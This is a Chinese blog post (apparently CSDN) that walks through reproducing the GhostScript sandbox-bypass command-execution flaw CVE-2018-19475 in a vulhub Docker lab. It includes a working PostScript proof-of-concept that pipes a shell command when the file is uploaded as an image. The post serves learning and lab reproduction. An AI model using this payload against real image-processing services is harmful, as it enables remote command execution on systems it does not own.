GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)复现

最新推荐文章于 2024-07-29 10:13:19 发布
最新推荐文章于 2024-07-29 10:13:19 发布
阅读量571 收藏
点赞数 1
分类专栏: 渗透实验 安全漏洞 渗透测试 文章标签: GhostScript 安全 渗透测试 安全漏洞 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HEAVEN569/article/details/125391732
版权

GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-19475)复现

1、漏洞描述

8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞

GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。

./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施。

影响版本

Ghostscript 9.24之前版本

2、靶机搭建

使用centos搭建的vulhub环境

cd vulhub-master/ghostscript/CVE-2018-19475

docker-compose up -d

访问:http://192.168.110.50:8080

3、漏洞复现

访问:http://192.168.110.50:8080

上传图片文件,使用burp抓包

poc:
%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%id > /tmp/success && cat /tmp/success) (w) file

用dnslog试一下,也有返回

ps:还有一点没有搞懂,就是这个命令只有第一二次,能成功执行,后面就无法执行了。不论修改什么参数都无法执行,需要重启一下靶机,才能再次执行命令。可能是原理或者poc有什么没有弄清,后面再学习一下原理。

声明:

本文仅限于大家技术交流和学习,严禁读者利用本博客的所有知识点进行非法操作。如果你利用文章中介绍的技术对他人造成损失,后果由您自行承担,感谢您的配合,

作者创作不容易,请大家点赞收藏支持一下。谢谢各位读者大老爷。

HEAVM
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475
qq_51577576的博客
12-17 712
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-19475 CVE-2018-19475CVE-2018-16509的变体,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509
qq_51577576的博客
12-07 729
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2018-16509 CVE-2018-16509是由于GhostScript在处理/invalidaccess异常时,程序没有正确的检测restoration of privilege(权限恢复),导致攻击者可通过提交特制的PostScript利用该漏洞执行代码。
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475
EC_Carrot的博客
06-06 570
漏洞背景 Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript(一种用于电子产业和桌面出版领域的页面描述语言和编程语言)解析器。该产品可显示Postscript文件以及在非Postscript打印机上打印Postscript文件。 Artifex Software Ghostscript 9.26之前版本中的psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限管理等安全措施
Ghostscript沙箱绕过(CVE-2021-3781)分析
Tencent_SRC的博客
10-29 1428
文|腾讯蓝军 路飞0x00 前言Ghostscript是一款Adobe PostScript语言和PDF的解释器软件,被诸多著名应用(如ImageMagick)所使用。9月5日,海外安全研...
Ghostscript库中的RCE漏洞已遭利用
smellycat000的专栏
07-09 162
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士广泛用于 Linux 系统上的文档转换工具集Ghostscript中存在一个远程代码执行漏洞,目前已遭利用。Ghostscript 预装在很多Linux发行版本中,且用于多种文档转换软件中如 ImageMagick、LibreOffice、GIMP、Inkscape、Scribus和CUPS 打印系统中。该漏洞编号为CVE-2024-29510,...
GhostScript 沙箱绕过命令执行漏洞
m0_63241485的博客
08-26 1145
当dorestore退出时,LockFilePermissions的值被设置为falsea = blob;随后使用.setuserparams方法还原LockFilePermissionsa = blob;但是,在restore之后,.setuserparams方法执行之前,可能会抛出StackOverflowError栈溢出错误,不会重置“LockFilePermissions”。从而导致绕过-dSAFER。...
GhostScript 沙箱绕过命令执行漏洞CVE-2019-6116)
EC_Carrot的博客
06-06 315
漏洞背景 2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。Artifex Software Ghostscript 9.26版本中存在输入验证错误漏洞。该漏洞源于网络系统或产品未对输入的数据进行正确的验证。该漏洞可以直接绕过 ghostscript安全沙箱,导致攻击者可以执行任意命令/读取任意文件。 漏洞复现 下载这个P
GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509)
Redredredfish的博客
09-16 1360
Day04 GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509) 漏洞概述 ①漏洞简介 ​ 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。 ②GhostScript GhostScript 是一套建基于Adobe、PostScript及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。Ghostscript 可以查看及打印
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2019-6116
qq_51577576的博客
12-13 760
[ vulhub漏洞复现篇 ] GhostScript 沙箱绕过(任意命令执行)漏洞CVE-2019-6116 CVE-2019-6116可以直接绕过 ghostscript安全沙箱,导致攻击者可以执行任意命令/读取任意文件。
利用Vulnhub复现漏洞 - GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509)
JiangBuLiu的博客
07-08 2030
GhostScript 沙箱绕过命令执行漏洞CVE-2018-16509)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现POC上传POC Vulnhub官方复现教程 https://vulhub.org/#/environments/ghostscript/CVE-2018-16509/ 漏洞原理 GhostScript 被许多图片处理库所使用,如 ImageMagick、Pyt...
docker-ghostscript
04-06
Ghostscript泊坞窗映像(atyasu / ghostscriptGhostscript是一套基于PostScript和PDF页面描述语言的解释器的软件。 它的主要目的是光栅化或渲染此类页面描述语言文件,以显示或打印文档页面,以及在PostScript和PDF文件之间进行转换。 用法 docker run --rm -v ` pwd ` :/app -w /app atyasu/ghostscript 标签 标签 尺寸 最新的 9 通过 叉子来自: :
GhostScript 沙箱绕过CVE-2018-16509)
最新发布
qq_62056583的博客
07-29 238
漏洞成因,在2018年Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞。即用户可以通过图片隐写的方式构造payload绕过检测构造命令执行。② 因为GhostScript被许多图片处理库使用,默认情况是GhostScript通过传入图片内容将其分发到不同的处理算法中当然也包括GhostScript
GhostScript沙箱绕过(命令执行漏洞)CVE-2018-16509
她叫常玉莹
07-27 1021
2018年8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 访问http://192.168.0.104:8080上传poc.png 执行id > /tmp/succ
vylhub学习文档-GhostScript 沙箱绕过命令执行漏洞
ploto_cs的博客
09-11 441
GhostScript 沙箱绕过命令执行漏洞 一.漏洞介绍 (一)编号 CVE-2018-16509 (二)概述 Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。 Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大 以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。 (三)适用条件 在文件上传过程中,有可
Python 渗透测试GhostScript 沙箱绕过.(CVE-2018-16509)
网络安全领域___专研者.
05-20 600
GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。但是,GhostScript 也可能存在安全漏洞,攻击者可以利用这些漏洞执行任意代码。GhostScript 沙箱就是为了解决这个问题而设计的。它将 GhostScript 解释器置于一个受限的执行环境中,限制其访问系统资源的能力。这样可以防止恶意代码在 Ghos
buuctf [GhostScript]CVE-2018-19475
qq_1873822的博客
03-30 444
漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 ./psi/zdevice2.c文件存在安全特征问题漏洞。该漏洞是源于网络系统或产品中缺少身份验证、访问控制、权限
GhostScript 沙箱绕过命令执行漏洞 CVE-2018-19475 漏洞复现
ADummy的博客
02-24 528
GhostScript 沙箱绕过命令执行漏洞CVE-2018-19475) by ADummy 0x00利用路线 ​ 构造poc png图片—>上传图片—>有回显命令执行 0x01漏洞介绍 ​ 2018年底来自Semmle Security Research Team的Man Yue Mo发表了CVE-2018-16509漏洞的变体CVE-2018-19475,可以通过一个恶意图片绕过GhostScript的沙盒,进而在9.26以前版本的gs中执行任意命令。 0x02漏洞复现 将P
Buuctf [GhostScript]CVE-2018-19475
ch258563的博客
05-30 160
Buuctf [GhostScript]CVE-2018-19475
ghostscript-9.02.tar.gz
05-15
ghostscript-9.02.tar.gz 是一个开源的软件包,该软件提供了一种将 PostScript 和 PDF 文件转换成其他格式(如 JPEG、PNG、TIFF 等)的方法。Ghostscript 能够解析 PostScript 和 PDF 页面描述语言,利用它们生成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值